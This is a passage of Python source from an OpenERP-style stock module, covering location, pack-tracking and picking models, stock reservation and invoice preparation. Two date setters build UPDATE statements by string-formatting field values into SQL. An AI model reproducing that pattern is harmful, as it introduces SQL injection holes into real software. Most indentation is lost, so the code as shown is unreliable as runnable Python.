help="This is used only if you select a chained location type.\n" \
"The 'Automatic Move' value will create a stock move after the current one that will be "\
"validated automatically. With 'Manual Operation', the stock move has to be validated "\
"by a worker. With 'Automatic No Step Added', the location is replaced in the original move."
),
'chained_picking_type': fields.selection([('out', 'Sending Goods'), ('in', 'Getting Goods'), ('internal', 'Internal')], 'Shipping Type', help="Shipping Type of the Picking List that will contain the chained move (leave empty to automatically detect the type based on the source and destination locations)."),
        'chained_company_id': fields.many2one('res.company', 'Chained Company', help='The company the Picking List containing the chained move will belong to (leave empty to use the default company determination rules)'),
'chained_delay': fields.integer('Chaining Lead Time',help="Delay between original move and chained move in days"),
'partner_id': fields.many2one('res.partner', 'Location Address',help="Address of customer or supplier."),
'icon': fields.selection(tools.icons, 'Icon', size=64,help="Icon show in hierarchical tree view"),
'comment': fields.text('Additional Information'),
'posx': fields.integer('Corridor (X)',help="Optional localization details, for information purpose only"),
'posy': fields.integer('Shelves (Y)', help="Optional localization details, for information purpose only"),
'posz': fields.integer('Height (Z)', help="Optional localization details, for information purpose only"),
'parent_left': fields.integer('Left Parent', select=1),
'parent_right': fields.integer('Right Parent', select=1),
'stock_real_value': fields.function(_product_value, type='float', string='Real Stock Value', multi="stock", digits_compute=dp.get_precision('Account')),
'stock_virtual_value': fields.function(_product_value, type='float', string='Virtual Stock Value', multi="stock", digits_compute=dp.get_precision('Account')),
'company_id': fields.many2one('res.company', 'Company', select=1, help='Let this field empty if this location is shared between all companies'),
'scrap_location': fields.boolean('Scrap Location', help='Check this box to allow using this location to put scrapped/damaged goods.'),
'valuation_in_account_id': fields.many2one('account.account', 'Stock Valuation Account (Incoming)', domain = [('type','=','other')],
help="Used for real-time inventory valuation. When set on a virtual location (non internal type), "
"this account will be used to hold the value of products being moved from an internal location "
"into this location, instead of the generic Stock Output Account set on the product. "
"This has no effect for internal locations."),
'valuation_out_account_id': fields.many2one('account.account', 'Stock Valuation Account (Outgoing)', domain = [('type','=','other')],
help="Used for real-time inventory valuation. When set on a virtual location (non internal type), "
"this account will be used to hold the value of products being moved out of this location "
"and into an internal location, instead of the generic Stock Output Account set on the product. "
"This has no effect for internal locations."),
}
_defaults = {
'active': True,
'usage': 'internal',
'chained_location_type': 'none',
'chained_auto_packing': 'manual',
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.location', context=c),
'posx': 0,
'posy': 0,
'posz': 0,
'icon': False,
'scrap_location': False,
}
def chained_location_get(self, cr, uid, location, partner=None, product=None, context=None):
""" Finds chained location
@param location: Location id
@param partner: Partner id
@param product: Product id
@return: List of values
"""
result = None
if location.chained_location_type == 'customer':
if partner:
result = partner.property_stock_customer
else:
loc_id = self.pool['res.partner'].default_get(cr, uid, ['property_stock_customer'], context=context)['property_stock_customer']
result = self.pool['stock.location'].browse(cr, uid, loc_id, context=context)
elif location.chained_location_type == 'fixed':
result = location.chained_location_id
if result:
return result, location.chained_auto_packing, location.chained_delay, location.chained_journal_id and location.chained_journal_id.id or False, location.chained_company_id and location.chained_company_id.id or False, location.chained_picking_type, False
return result
def picking_type_get(self, cr, uid, from_location, to_location, context=None):
""" Gets type of picking.
@param from_location: Source location
@param to_location: Destination location
@return: Location type
"""
result = 'internal'
if (from_location.usage=='internal') and (to_location and to_location.usage in ('customer', 'supplier')):
result = 'out'
elif (from_location.usage in ('supplier', 'customer')) and (to_location.usage == 'internal'):
result = 'in'
return result
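    # Informal summary of the mapping above: internal -> customer/supplier
    # yields 'out', supplier/customer -> internal yields 'in', and any other
    # combination (e.g. internal -> internal) falls back to 'internal'.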
def _product_get_all_report(self, cr, uid, ids, product_ids=False, context=None):
return self._product_get_report(cr, uid, ids, product_ids, context, recursive=True)
def _product_get_report(self, cr, uid, ids, product_ids=False,
context=None, recursive=False):
""" Finds the product quantity and price for particular location.
@param product_ids: Ids of product
@param recursive: True or False
@return: Dictionary of values
"""
if context is None:
context = {}
product_obj = self.pool.get('product.product')
# Take the user company and pricetype
context['currency_id'] = self.pool.get('res.users').browse(cr, uid, uid, context=context).company_id.currency_id.id
# To be able to offer recursive or non-recursive reports we need to prevent recursive quantities by default
context['compute_child'] = False
if not product_ids:
product_ids = product_obj.search(cr, uid, [], context={'active_test': False})
products = product_obj.browse(cr, uid, product_ids, context=context)
products_by_uom = {}
products_by_id = {}
for product in products:
products_by_uom.setdefault(product.uom_id.id, [])
products_by_uom[product.uom_id.id].append(product)
products_by_id.setdefault(product.id, [])
products_by_id[product.id] = product
result = {}
result['product'] = []
for id in ids:
quantity_total = 0.0
total_price = 0.0
for uom_id in products_by_uom.keys():
fnc = self._product_get
if recursive:
fnc = self._product_all_get
ctx = context.copy()
ctx['uom'] = uom_id
qty = fnc(cr, uid, id, [x.id for x in products_by_uom[uom_id]],
context=ctx)
for product_id in qty.keys():
if not qty[product_id]:
continue
product = products_by_id[product_id]
quantity_total += qty[product_id]
# Compute based on pricetype
                    # Choose the right field (standard_price) to read
amount_unit = product.price_get('standard_price', context=context)[product.id]
price = qty[product_id] * amount_unit
total_price += price
result['product'].append({
'price': amount_unit,
'prod_name': product.name,
'code': product.default_code, # used by lot_overview_all report!
'variants': product.variants or '',
'uom': product.uom_id.name,
'prod_qty': qty[product_id],
'price_value': price,
})
result['total'] = quantity_total
result['total_price'] = total_price
return result
def _product_get_multi_location(self, cr, uid, ids, product_ids=False, context=None,
states=['done'], what=('in', 'out')):
"""
@param product_ids: Ids of product
@param states: List of states
        @param what: Tuple of move directions to take into account ('in', 'out')
@return:
"""
product_obj = self.pool.get('product.product')
if context is None:
context = {}
context.update({
'states': states,
'what': what,
'location': ids
})
return product_obj.get_product_available(cr, uid, product_ids, context=context)
def _product_get(self, cr, uid, id, product_ids=False, context=None, states=None):
"""
@param product_ids:
@param states:
@return:
"""
if states is None:
states = ['done']
ids = id and [id] or []
return self._product_get_multi_location(cr, uid, ids, product_ids, context=context, states=states)
def _product_all_get(self, cr, uid, id, product_ids=False, context=None, states=None):
if states is None:
states = ['done']
# build the list of ids of children of the location given by id
ids = id and [id] or []
location_ids = self.search(cr, uid, [('location_id', 'child_of', ids)])
return self._product_get_multi_location(cr, uid, location_ids, product_ids, context, states)
def _product_virtual_get(self, cr, uid, id, product_ids=False, context=None, states=None):
if states is None:
states = ['done']
return self._product_all_get(cr, uid, id, product_ids, context, ['confirmed', 'waiting', 'assigned', 'done'])
def _product_reserve(self, cr, uid, ids, product_id, product_qty, context=None, lock=False):
"""
Attempt to find a quantity ``product_qty`` (in the product's default uom or the uom passed in ``context``) of product ``product_id``
in locations with id ``ids`` and their child locations. If ``lock`` is True, the stock.move lines
of product with id ``product_id`` in the searched location will be write-locked using Postgres's
"FOR UPDATE NOWAIT" option until the transaction is committed or rolled back, to prevent reservin
twice the same products.
If ``lock`` is True and the lock cannot be obtained (because another transaction has locked some of
the same stock.move lines), a log line will be output and False will be returned, as if there was
not enough stock.
:param product_id: Id of product to reserve
:param product_qty: Quantity of product to reserve (in the product's default uom or the uom passed in ``context``)
:param lock: if True, the stock.move lines of product with id ``product_id`` in all locations (and children locations) with ``ids`` will
be write-locked using postgres's "FOR UPDATE NOWAIT" option until the transaction is committed or rolled back. This is
                     to prevent reserving the same products twice.
:param context: optional context dictionary: if a 'uom' key is present it will be used instead of the default product uom to
compute the ``product_qty`` and in the return value.
:return: List of tuples in the form (qty, location_id) with the (partial) quantities that can be taken in each location to
                 reach the requested product_qty (``qty`` is expressed in the default uom of the product), or False if enough
products could not be found, or the lock could not be obtained (and ``lock`` was True).
"""
result = []
amount = 0.0
if context is None:
context = {}
uom_obj = self.pool.get('product.uom')
uom_rounding = self.pool.get('product.product').browse(cr, uid, product_id, context=context).uom_id.rounding
if context.get('uom'):
uom_rounding = uom_obj.browse(cr, uid, context.get('uom'), context=context).rounding
locations_ids = self.search(cr, uid, [('location_id', 'child_of', ids)])
if locations_ids:
# Fetch only the locations in which this product has ever been processed (in or out)
cr.execute("""SELECT l.id FROM stock_location l WHERE l.id in %s AND
EXISTS (SELECT 1 FROM stock_move m WHERE m.product_id = %s
AND ((state = 'done' AND m.location_dest_id = l.id)
OR (state in ('done','assigned') AND m.location_id = l.id)))
""", (tuple(locations_ids), product_id,))
locations_ids = [i for (i,) in cr.fetchall()]
for id in locations_ids:
if lock:
try:
# Must lock with a separate select query because FOR UPDATE can't be used with
# aggregation/group by's (when individual rows aren't identifiable).
# We use a SAVEPOINT to be able to rollback this part of the transaction without
# failing the whole transaction in case the LOCK cannot be acquired.
cr.execute("SAVEPOINT stock_location_product_reserve")
cr.execute("""SELECT id FROM stock_move
WHERE product_id=%s AND
(
(location_dest_id=%s AND
location_id<>%s AND
state='done')
OR
(location_id=%s AND
location_dest_id<>%s AND
state in ('done', 'assigned'))
)
FOR UPDATE of stock_move NOWAIT""", (product_id, id, id, id, id), log_exceptions=False)
except Exception:
# Here it's likely that the FOR UPDATE NOWAIT failed to get the LOCK,
# so we ROLLBACK to the SAVEPOINT to restore the transaction to its earlier
# state, we return False as if the products were not available, and log it:
cr.execute("ROLLBACK TO stock_location_product_reserve")
_logger.warning("Failed attempt to reserve %s x product %s, likely due to another transaction already in progress. Next attempt is likely to work. Detailed error available at DEBUG level.", product_qty, product_id)
_logger.debug("Trace of the failed product reservation attempt: ", exc_info=True)
return False
# XXX TODO: rewrite this with one single query, possibly even the quantity conversion
cr.execute("""SELECT product_uom, sum(product_qty) AS product_qty
FROM stock_move
WHERE location_dest_id=%s AND
location_id<>%s AND
product_id=%s AND
state='done'
GROUP BY product_uom
""",
(id, id, product_id))
results = cr.dictfetchall()
cr.execute("""SELECT product_uom,-sum(product_qty) AS product_qty
FROM stock_move
WHERE location_id=%s AND
location_dest_id<>%s AND
product_id=%s AND
state in ('done', 'assigned')
GROUP BY product_uom
""",
(id, id, product_id))
results += cr.dictfetchall()
total = 0.0
results2 = 0.0
for r in results:
amount = uom_obj._compute_qty(cr, uid, r['product_uom'], r['product_qty'], context.get('uom', False))
results2 += amount
total += amount
if total <= 0.0:
continue
amount = results2
compare_qty = float_compare(amount, 0, precision_rounding=uom_rounding)
if compare_qty == 1:
if amount > min(total, product_qty):
amount = min(product_qty, total)
result.append((amount, id))
product_qty -= amount
total -= amount
if product_qty <= 0.0:
return result
if total <= 0.0:
continue
return False
stock_location()
class stock_tracking(osv.osv):
_name = "stock.tracking"
_description = "Packs"
def checksum(sscc):
salt = '31' * 8 + '3'
sum = 0
for sscc_part, salt_part in zip(sscc, salt):
sum += int(sscc_part) * int(salt_part)
return (10 - (sum % 10)) % 10
checksum = staticmethod(checksum)
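    # Informal check of the modulo-10, 3/1-weighted check digit computed above:
    #   checksum('0' * 17)            == 0
    #   checksum('00000000000000001') == 7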
def make_sscc(self, cr, uid, context=None):
sequence = self.pool.get('ir.sequence').get(cr, uid, 'stock.lot.tracking')
try:
return sequence + str(self.checksum(sequence))
except Exception:
return sequence
_columns = {
'name': fields.char('Pack Reference', size=64, required=True, select=True, help="By default, the pack reference is generated following the sscc standard. (Serial number + 1 check digit)"),
'active': fields.boolean('Active', help="By unchecking the active field, you may hide a pack without deleting it."),
'serial': fields.char('Additional Reference', size=64, select=True, help="Other reference or serial number"),
'move_ids': fields.one2many('stock.move', 'tracking_id', 'Moves for this pack', readonly=True),
'date': fields.datetime('Creation Date', required=True),
}
_defaults = {
'active': 1,
'name': make_sscc,
'date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
}
def name_search(self, cr, user, name, args=None, operator='ilike', context=None, limit=100):
if not args:
args = []
ids = self.search(cr, user, [('serial', '=', name)]+ args, limit=limit, context=context)
ids += self.search(cr, user, [('name', operator, name)]+ args, limit=limit, context=context)
return self.name_get(cr, user, ids, context)
def name_get(self, cr, uid, ids, context=None):
"""Append the serial to the name"""
if not len(ids):
return []
res = [ (r['id'], r['serial'] and '%s [%s]' % (r['name'], r['serial'])
or r['name'] )
for r in self.read(cr, uid, ids, ['name', 'serial'],
context=context) ]
return res
def unlink(self, cr, uid, ids, context=None):
raise osv.except_osv(_('Error!'), _('You cannot remove a lot line.'))
def action_traceability(self, cr, uid, ids, context=None):
""" It traces the information of a product
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
@return: A dictionary of values
"""
return self.pool.get('action.traceability').action_traceability(cr,uid,ids,context)
stock_tracking()
#----------------------------------------------------------
# Stock Picking
#----------------------------------------------------------
class stock_picking(osv.osv):
_name = "stock.picking"
_inherit = ['mail.thread']
_description = "Picking List"
_order = "id desc"
def _set_maximum_date(self, cr, uid, ids, name, value, arg, context=None):
""" Calculates planned date if it is greater than 'value'.
@param name: Name of field
@param value: Value of field
@param arg: User defined argument
@return: True or False
"""
if not value:
return False
if isinstance(ids, (int, long)):
ids = [ids]
for pick in self.browse(cr, uid, ids, context=context):
sql_str = """update stock_move set
date_expected='%s'
where
picking_id=%d """ % (value, pick.id)
if pick.max_date:
sql_str += " and (date_expected='" + pick.max_date + "')"
cr.execute(sql_str)
return True
def _set_minimum_date(self, cr, uid, ids, name, value, arg, context=None):
""" Calculates planned date if it is less than 'value'.
@param name: Name of field
@param value: Value of field
@param arg: User defined argument
@return: True or False
"""
if not value:
return False
if isinstance(ids, (int, long)):
ids = [ids]
for pick in self.browse(cr, uid, ids, context=context):
sql_str = """update stock_move set
date_expected='%s'
where
picking_id=%s """ % (value, pick.id)
if pick.min_date:
sql_str += " and (date_expected='" + pick.min_date + "')"
cr.execute(sql_str)
return True
def get_min_max_date(self, cr, uid, ids, field_name, arg, context=None):
""" Finds minimum and maximum dates for picking.
@return: Dictionary of values
"""
res = {}
for id in ids:
res[id] = {'min_date': False, 'max_date': False}
if not ids:
return res
cr.execute("""select
picking_id,
min(date_expected),
max(date_expected)
from
stock_move
where
picking_id IN %s
group by
picking_id""",(tuple(ids),))
for pick, dt1, dt2 in cr.fetchall():
res[pick]['min_date'] = dt1
res[pick]['max_date'] = dt2
return res
def create(self, cr, user, vals, context=None):
if ('name' not in vals) or (vals.get('name')=='/'):
seq_obj_name = self._name
vals['name'] = self.pool.get('ir.sequence').get(cr, user, seq_obj_name)
new_id = super(stock_picking, self).create(cr, user, vals, context)
return new_id
_columns = {
'name': fields.char('Reference', size=64, select=True, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
'origin': fields.char('Source Document', size=64, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="Reference of the document", select=True),
'backorder_id': fields.many2one('stock.picking', 'Back Order of', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="If this shipment was split, then this field links to the shipment which contains the already processed part.", select=True),
        'type': fields.selection([('out', 'Sending Goods'), ('in', 'Getting Goods'), ('internal', 'Internal')], 'Shipping Type', required=True, select=True, help="Shipping type specifies whether goods are coming in or going out."),
'note': fields.text('Notes', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
'stock_journal_id': fields.many2one('stock.journal','Stock Journal', select=True, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
'location_id': fields.many2one('stock.location', 'Location', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="Keep empty if you produce at the location where the finished products are needed." \
"Set a location if you produce at a fixed location. This can be a partner location " \
"if you subcontract the manufacturing operations.", select=True),
'location_dest_id': fields.many2one('stock.location', 'Dest. Location', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="Location where the system will stock the finished products.", select=True),
        'move_type': fields.selection([('direct', 'Partial'), ('one', 'All at once')], 'Delivery Method', required=True, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="It specifies whether goods are to be delivered partially or all at once"),
'state': fields.selection([
('draft', 'Draft'),
('cancel', 'Cancelled'),
('auto', 'Waiting Another Operation'),
('confirmed', 'Waiting Availability'),
('assigned', 'Ready to Transfer'),
('done', 'Transferred'),
], 'Status', readonly=True, select=True, track_visibility='onchange', help="""
* Draft: not confirmed yet and will not be scheduled until confirmed\n
* Waiting Another Operation: waiting for another move to proceed before it becomes automatically available (e.g. in Make-To-Order flows)\n
* Waiting Availability: still waiting for the availability of products\n
* Ready to Transfer: products reserved, simply waiting for confirmation.\n
* Transferred: has been processed, can't be modified or cancelled anymore\n
* Cancelled: has been cancelled, can't be confirmed anymore"""
),
'min_date': fields.function(get_min_max_date, fnct_inv=_set_minimum_date, multi="min_max_date",
store=True, type='datetime', string='Scheduled Time', select=1, help="Scheduled time for the shipment to be processed"),
'date': fields.datetime('Creation Date', help="Creation date, usually the time of the order.", select=True, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
'date_done': fields.datetime('Date of Transfer', help="Date of Completion", states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
'max_date': fields.function(get_min_max_date, fnct_inv=_set_maximum_date, multi="min_max_date",
store=True, type='datetime', string='Max. Expected Date', select=2),
'move_lines': fields.one2many('stock.move', 'picking_id', 'Internal Moves', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}),
'product_id': fields.related('move_lines', 'product_id', type='many2one', relation='product.product', string='Product'),
'auto_picking': fields.boolean('Auto-Picking', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
'partner_id': fields.many2one('res.partner', 'Partner', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
'invoice_state': fields.selection([
("invoiced", "Invoiced"),
("2binvoiced", "To Be Invoiced"),
("none", "Not Applicable")], "Invoice Control",
select=True, required=True, readonly=True, track_visibility='onchange', states={'draft': [('readonly', False)]}),
'company_id': fields.many2one('res.company', 'Company', required=True, select=True, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
}
_defaults = {
'name': lambda self, cr, uid, context: '/',
'state': 'draft',
'move_type': 'direct',
'type': 'internal',
'invoice_state': 'none',
'date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.picking', context=c)
}
_sql_constraints = [
('name_uniq', 'unique(name, company_id)', 'Reference must be unique per Company!'),
]
    def action_process(self, cr, uid, ids, context=None):
        """Open the partial picking wizard"""
        if context is None:
            context = {}
context.update({
'active_model': self._name,
'active_ids': ids,
'active_id': len(ids) and ids[0] or False
})
return {
'view_type': 'form',
'view_mode': 'form',
'res_model': 'stock.partial.picking',
'type': 'ir.actions.act_window',
'target': 'new',
'context': context,
'nodestroy': True,
}
def copy(self, cr, uid, id, default=None, context=None):
if default is None:
default = {}
default = default.copy()
picking_obj = self.browse(cr, uid, id, context=context)
if ('name' not in default) or (picking_obj.name == '/'):
seq_obj_name = 'stock.picking.' + picking_obj.type
default['name'] = self.pool.get('ir.sequence').get(cr, uid, seq_obj_name)
default.setdefault('origin', False)
default.setdefault('backorder_id', False)
if 'invoice_state' not in default and picking_obj.invoice_state == 'invoiced':
default['invoice_state'] = '2binvoiced'
res = super(stock_picking, self).copy(cr, uid, id, default, context)
return res
def fields_view_get(self, cr, uid, view_id=None, view_type=False, context=None, toolbar=False, submenu=False):
if view_type == 'form' and not view_id:
mod_obj = self.pool.get('ir.model.data')
if self._name == "stock.picking.in":
model, view_id = mod_obj.get_object_reference(cr, uid, 'stock', 'view_picking_in_form')
if self._name == "stock.picking.out":
model, view_id = mod_obj.get_object_reference(cr, uid, 'stock', 'view_picking_out_form')
return super(stock_picking, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar, submenu=submenu)
def onchange_partner_in(self, cr, uid, ids, partner_id=None, context=None):
return {}
def action_explode(self, cr, uid, moves, context=None):
"""Hook to allow other modules to split the moves of a picking."""
return moves
def action_confirm(self, cr, uid, ids, context=None):
""" Confirms picking.
@return: True
"""
pickings = self.browse(cr, uid, ids, context=context)
self.write(cr, uid, ids, {'state': 'confirmed'})
todo = []
for picking in pickings:
for r in picking.move_lines:
if r.state == 'draft':
todo.append(r.id)
todo = self.action_explode(cr, uid, todo, context)
if len(todo):
self.pool.get('stock.move').action_confirm(cr, uid, todo, context=context)
return True
def test_auto_picking(self, cr, uid, ids):
# TODO: Check locations to see if in the same location ?
return True
def action_assign(self, cr, uid, ids, *args):
""" Changes state of picking to available if all moves are confirmed.
@return: True
"""
wf_service = netsvc.LocalService("workflow")
for pick in self.browse(cr, uid, ids):
if pick.state == 'draft':
wf_service.trg_validate(uid, 'stock.picking', pick.id, 'button_confirm', cr)
move_ids = [x.id for x in pick.move_lines if x.state == 'confirmed']
if not move_ids:
raise osv.except_osv(_('Warning!'),_('Not enough stock, unable to reserve the products.'))
self.pool.get('stock.move').action_assign(cr, uid, move_ids)
return True
def force_assign(self, cr, uid, ids, *args):
""" Changes state of picking to available if moves are confirmed or waiting.
@return: True
"""
wf_service = netsvc.LocalService("workflow")
for pick in self.browse(cr, uid, ids):
move_ids = [x.id for x in pick.move_lines if x.state in ['confirmed','waiting']]
self.pool.get('stock.move').force_assign(cr, uid, move_ids)
wf_service.trg_write(uid, 'stock.picking', pick.id, cr)
return True
def draft_force_assign(self, cr, uid, ids, *args):
""" Confirms picking directly from draft state.
@return: True
"""
wf_service = netsvc.LocalService("workflow")
for pick in self.browse(cr, uid, ids):
if not pick.move_lines:
                raise osv.except_osv(_('Error!'),_('You cannot process a picking without stock moves.'))
wf_service.trg_validate(uid, 'stock.picking', pick.id,
'button_confirm', cr)
return True
def draft_validate(self, cr, uid, ids, context=None):
""" Validates picking directly from draft state.
@return: True
"""
wf_service = netsvc.LocalService("workflow")
self.draft_force_assign(cr, uid, ids)
for pick in self.browse(cr, uid, ids, context=context):
move_ids = [x.id for x in pick.move_lines]
self.pool.get('stock.move').force_assign(cr, uid, move_ids)
wf_service.trg_write(uid, 'stock.picking', pick.id, cr)
return self.action_process(
cr, uid, ids, context=context)
def cancel_assign(self, cr, uid, ids, *args):
""" Cancels picking and moves.
@return: True
"""
wf_service = netsvc.LocalService("workflow")
for pick in self.browse(cr, uid, ids):
move_ids = [x.id for x in pick.move_lines]
self.pool.get('stock.move').cancel_assign(cr, uid, move_ids)
wf_service.trg_write(uid, 'stock.picking', pick.id, cr)
return True
def action_assign_wkf(self, cr, uid, ids, context=None):
""" Changes picking state to assigned.
@return: True
"""
self.write(cr, uid, ids, {'state': 'assigned'})
return True
def test_finished(self, cr, uid, ids):
""" Tests whether the move is in done or cancel state or not.
@return: True or False
"""
move_ids = self.pool.get('stock.move').search(cr, uid, [('picking_id', 'in', ids)])
for move in self.pool.get('stock.move').browse(cr, uid, move_ids):
if move.state not in ('done', 'cancel'):
if move.product_qty != 0.0:
return False
else:
move.write({'state': 'done'})
return True
def test_assigned(self, cr, uid, ids):
""" Tests whether the move is in assigned state or not.
@return: True or False
"""
        #TOFIX: assignment of move lines should be called before testing assignment, otherwise the picking never goes into the assigned state
ok = True
for pick in self.browse(cr, uid, ids):
mt = pick.move_type
            # incoming shipments are always set as available if they aren't chained
if pick.type == 'in':
if all([x.state != 'waiting' for x in pick.move_lines]):
return True
for move in pick.move_lines:
if (move.state in ('confirmed', 'draft')) and (mt == 'one'):
return False
if (mt == 'direct') and (move.state == 'assigned') and (move.product_qty):
return True
ok = ok and (move.state in ('cancel', 'done', 'assigned'))
return ok
def action_cancel(self, cr, uid, ids, context=None):
""" Changes picking state to cancel.
@return: True
"""
for pick in self.browse(cr, uid, ids, context=context):
ids2 = [move.id for move in pick.move_lines]
self.pool.get('stock.move').action_cancel(cr, uid, ids2, context)
self.write(cr, uid, ids, {'state': 'cancel', 'invoice_state': 'none'})
return True
#
# TODO: change and create a move if not parents
#
def action_done(self, cr, uid, ids, context=None):
"""Changes picking state to done.
This method is called at the end of the workflow by the activity "done".
@return: True
"""
for picking in self.browse(cr, uid, ids, context=context):
values = {
'state': 'done'
}
if not picking.date_done:
values['date_done'] = time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
picking.write(values)
return True
def action_move(self, cr, uid, ids, context=None):
"""Process the Stock Moves of the Picking
This method is called by the workflow by the activity "move".
Normally that happens when the signal button_done is received (button
"Done" pressed on a Picking view).
@return: True
"""
for pick in self.browse(cr, uid, ids, context=context):
todo = []
for move in pick.move_lines:
if move.state == 'draft':
self.pool.get('stock.move').action_confirm(cr, uid, [move.id],
context=context)
todo.append(move.id)
elif move.state in ('assigned','confirmed'):
todo.append(move.id)
if len(todo):
self.pool.get('stock.move').action_done(cr, uid, todo,
context=context)
return True
def get_currency_id(self, cr, uid, picking):
return False
def _get_partner_to_invoice(self, cr, uid, picking, context=None):
""" Gets the partner that will be invoiced
Note that this function is inherited in the sale and purchase modules
@param picking: object of the picking for which we are selecting the partner to invoice
@return: object of the partner to invoice
"""
return picking.partner_id and picking.partner_id.id
def _get_comment_invoice(self, cr, uid, picking):
"""
@return: comment string for invoice
"""
return picking.note or ''
def _get_price_unit_invoice(self, cr, uid, move_line, type, context=None):
""" Gets price unit for invoice
@param move_line: Stock move lines
@param type: Type of invoice
@return: The price unit for the move line
"""
if context is None:
context = {}
if type in ('in_invoice', 'in_refund'):
# Take the user company and pricetype
context['currency_id'] = move_line.company_id.currency_id.id
amount_unit = move_line.product_id.price_get('standard_price', context=context)[move_line.product_id.id]
return amount_unit
else:
return move_line.product_id.list_price
def _get_discount_invoice(self, cr, uid, move_line):
'''Return the discount for the move line'''
return 0.0
def _get_taxes_invoice(self, cr, uid, move_line, type):
""" Gets taxes on invoice
@param move_line: Stock move lines
@param type: Type of invoice
@return: Taxes Ids for the move line
"""
if type in ('in_invoice', 'in_refund'):
taxes = move_line.product_id.supplier_taxes_id
else:
taxes = move_line.product_id.taxes_id
if move_line.picking_id and move_line.picking_id.partner_id and move_line.picking_id.partner_id.id:
return self.pool.get('account.fiscal.position').map_tax(
cr,
uid,
move_line.picking_id.partner_id.property_account_position,
taxes
)
else:
return map(lambda x: x.id, taxes)
def _get_account_analytic_invoice(self, cr, uid, picking, move_line):
return False
def _invoice_line_hook(self, cr, uid, move_line, invoice_line_id):
'''Call after the creation of the invoice line'''
return
def _invoice_hook(self, cr, uid, picking, invoice_id):
'''Call after the creation of the invoice'''
return
def _get_invoice_type(self, pick):
src_usage = dest_usage = None
inv_type = None
if pick.invoice_state == '2binvoiced':
if pick.move_lines:
src_usage = pick.move_lines[0].location_id.usage
dest_usage = pick.move_lines[0].location_dest_id.usage
if pick.type == 'out' and dest_usage == 'supplier':
inv_type = 'in_refund'
elif pick.type == 'out' and dest_usage == 'customer':
inv_type = 'out_invoice'
elif pick.type == 'in' and src_usage == 'supplier':
inv_type = 'in_invoice'
elif pick.type == 'in' and src_usage == 'customer':
inv_type = 'out_refund'
else:
inv_type = 'out_invoice'
return inv_type
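    # Summary of the mapping implemented above (applied only when the picking
    # has invoice_state '2binvoiced'; otherwise None is returned):
    #   type 'out' + destination 'supplier' -> 'in_refund'
    #   type 'out' + destination 'customer' -> 'out_invoice'
    #   type 'in'  + source 'supplier'      -> 'in_invoice'
    #   type 'in'  + source 'customer'      -> 'out_refund'
    #   any other combination               -> 'out_invoice'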
def _prepare_invoice_group(self, cr, uid, picking, partner, invoice, context=None):
""" Builds the dict for grouped invoices
@param picking: picking object
        @param partner: object of the partner to invoice (not used here, but may be useful if this function is inherited)
@param invoice: object of the invoice that we are updating
@return: dict that will be used to update the invoice
"""
comment = self._get_comment_invoice(cr, uid, picking)
return {
'name': (invoice.name or '') + ', ' + (picking.name or ''),
'origin': (invoice.origin or '') + ', ' + (picking.name or '') + (picking.origin and (':' + picking.origin) or ''),
'comment': (comment and (invoice.comment and invoice.comment + "\n" + comment or comment)) or (invoice.comment and invoice.comment or ''),
'date_invoice': context.get('date_inv', False),
}
def _prepare_invoice(self, cr, uid, picking, partner, inv_type, journal_id, context=None):
""" Builds the dict containing the values for the invoice
@param picking: picking object
@param partner: object of the partner to invoice
@param inv_type: type of the invoice ('out_invoice', 'in_invoice', ...)
@param journal_id: ID of the accounting journal
@return: dict that will be used to create the invoice object
"""
if isinstance(partner, int):
partner = self.pool.get('res.partner').browse(cr, uid, partner, context=context)
if inv_type in ('out_invoice', 'out_refund'):
account_id = partner.property_account_receivable.id
payment_term = partner.property_payment_term.id or False
else:
account_id = partner.property_account_payable.id
payment_term = partner.property_supplier_payment_term.id or False
comment = self._get_comment_invoice(cr, uid, picking)
invoice_vals = {
'name': picking.name,
'origin': (picking.name or '') + (picking.origin and (':' + picking.origin) or ''),
'type': inv_type,
'account_id': account_id,
'partner_id': partner.id,
'comment': comment,
'payment_term': payment_term,
'fiscal_position': partner.property_account_position.id,
'date_invoice': context.get('date_inv', False),
'company_id': picking.company_id.id,
'user_id': uid,
}
cur_id = self.get_currency_id(cr, uid, picking)
if cur_id:
invoice_vals['currency_id'] = cur_id
if journal_id:
invoice_vals['journal_id'] = journal_id
return invoice_vals
def _prepare_invoice_line(self, cr, uid, group, picking, move_line, invoice_id,
invoice_vals, context=None):
""" Builds the dict containing the values for the invoice line
@param group: True or False
@param picking: picking object
@param: move_line: move_line object
@param: invoice_id: ID of the related invoice
        @param: invoice_vals: dict used to create the invoice
@return: dict that will be used to create the invoice line
"""
if group:
name = (picking.name or '') + '-' + move_line.name
else:
name = move_line.name
origin = move_line.picking_id.name or ''
if move_line.picking_id.origin:
origin += ':' + move_line.picking_id.origin
if invoice_vals['type'] in ('out_invoice', 'out_refund'):
account_id = move_line.product_id.property_account_income.id
if not account_id:
account_id = move_line.product_id.categ_id.\
property_account_income_categ.id
else:
account_id = move_line.product_id.property_account_expense.id
if not account_id:
account_id = move_line.product_id.categ_id.\
property_account_expense_categ.id
if invoice_vals['fiscal_position']:
fp_obj = self.pool.get('account.fiscal.position')
fiscal_position = fp_obj.browse(cr, uid, invoice_vals['fiscal_position'], context=context)
account_id = fp_obj.map_account(cr, uid, fiscal_position, account_id)
# set UoS if it's a sale and the picking doesn't have one
